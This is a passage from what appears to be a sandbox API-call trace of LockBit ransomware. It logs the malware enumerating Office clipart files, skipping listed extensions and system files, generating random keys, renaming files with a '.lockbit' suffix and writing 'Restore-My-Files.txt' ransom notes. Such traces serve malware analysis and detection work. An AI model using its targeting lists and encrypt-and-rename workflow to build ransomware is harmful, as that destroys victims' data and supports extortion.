Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0108.368] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5124300, ftCreationTime.dwHighDateTime=0x1bd4b2e, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe5124300, ftLastWriteTime.dwHighDateTime=0x1bd4b2e, nFileSizeHigh=0x0, nFileSizeLow=0x386c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00247_.WMF", cAlternateFileName="")) returned 1 [0108.368] lstrcmpiW (lpString1=".", lpString2="BL00247_.WMF") returned -1 [0108.368] lstrcmpiW (lpString1="..", lpString2="BL00247_.WMF") returned -1 [0108.368] PathFindExtensionW (pszPath="BL00247_.WMF") returned=".WMF" [0108.368] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0108.368] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0108.368] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0108.368] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0108.368] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0108.368] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0108.368] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0108.368] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0108.368] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0108.369] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0108.369] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00247_.WMF") returned 1 [0108.370] lstrcmpiW (lpString1="ntldr", lpString2="BL00247_.WMF") returned 1 [0108.370] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00247_.WMF") returned 1 [0108.370] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00247_.WMF") returned 1 [0108.370] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00247_.WMF") returned -1 [0108.370] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00247_.WMF") returned 1 [0108.370] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00247_.WMF") returned 1 [0108.370] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0108.370] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned=".WMF" [0108.370] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0108.370] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0108.370] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0108.371] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0108.371] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0108.371] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0108.371] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0108.371] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0108.371] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0108.371] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0108.371] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0108.371] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0108.371] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0108.371] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0108.371] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0108.371] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.lockbit") returned 72 [0108.371] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0108.371] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0108.372] malloc (_Size=0x40068) returned 0x1ff1e60 [0108.372] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=14444) returned 1 [0108.372] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.372] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0108.372] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.373] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0108.373] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.377] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.377] malloc (_Size=0xa6) returned 0x77d800 [0108.377] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0108.428] free (_Block=0x77d800) [0108.428] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0108.428] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0108.428] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0108.428] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b9eb00, ftCreationTime.dwHighDateTime=0x1bd4b2e, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9b9eb00, ftLastWriteTime.dwHighDateTime=0x1bd4b2e, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00248_.WMF", cAlternateFileName="")) returned 1 [0108.428] lstrcmpiW (lpString1=".", lpString2="BL00248_.WMF") returned -1 [0108.428] lstrcmpiW (lpString1="..", lpString2="BL00248_.WMF") returned -1 [0108.428] PathFindExtensionW (pszPath="BL00248_.WMF") returned=".WMF" [0108.429] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0108.429] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0108.429] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00248_.WMF") returned 1 [0108.430] lstrcmpiW (lpString1="ntldr", lpString2="BL00248_.WMF") returned 1 [0108.430] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00248_.WMF") returned 1 [0108.430] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00248_.WMF") returned 1 [0108.430] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00248_.WMF") returned -1 [0108.430] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00248_.WMF") returned 1 [0108.430] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00248_.WMF") returned 1 [0108.430] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0108.430] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned=".WMF" [0108.430] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0108.430] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0108.430] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0108.431] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0108.431] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0108.431] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0108.431] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0108.431] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0108.431] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0108.431] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0108.431] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0108.431] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0108.431] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0108.431] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0108.431] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0108.431] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0108.431] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0108.431] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0108.431] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0108.431] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0108.431] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.lockbit") returned 72 [0108.431] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0108.432] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0108.432] malloc (_Size=0x40068) returned 0x1ff1e60 [0108.432] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1536) returned 1 [0108.432] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.432] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0108.432] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.433] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0108.433] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0108.447] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.447] malloc (_Size=0xa6) returned 0x77d800 [0108.447] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0108.447] free (_Block=0x77d800) [0108.447] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0108.447] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0108.447] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0108.447] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b67a200, ftCreationTime.dwHighDateTime=0x1bd4b2f, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2b67a200, ftLastWriteTime.dwHighDateTime=0x1bd4b2f, nFileSizeHigh=0x0, nFileSizeLow=0x1264, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00252_.WMF", cAlternateFileName="")) returned 1 [0108.447] lstrcmpiW (lpString1=".", lpString2="BL00252_.WMF") returned -1 [0108.447] lstrcmpiW (lpString1="..", lpString2="BL00252_.WMF") returned -1 [0108.448] PathFindExtensionW (pszPath="BL00252_.WMF") returned=".WMF" [0108.448] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.448] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0108.449] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0108.449] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00252_.WMF") returned 1 [0108.449] lstrcmpiW (lpString1="ntldr", lpString2="BL00252_.WMF") returned 1 [0108.449] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00252_.WMF") returned 1 [0108.449] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00252_.WMF") returned 1 [0108.449] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00252_.WMF") returned -1 [0108.449] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00252_.WMF") returned 1 [0108.450] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00252_.WMF") returned 1 [0108.450] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0108.450] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned=".WMF" [0108.450] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0108.450] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW 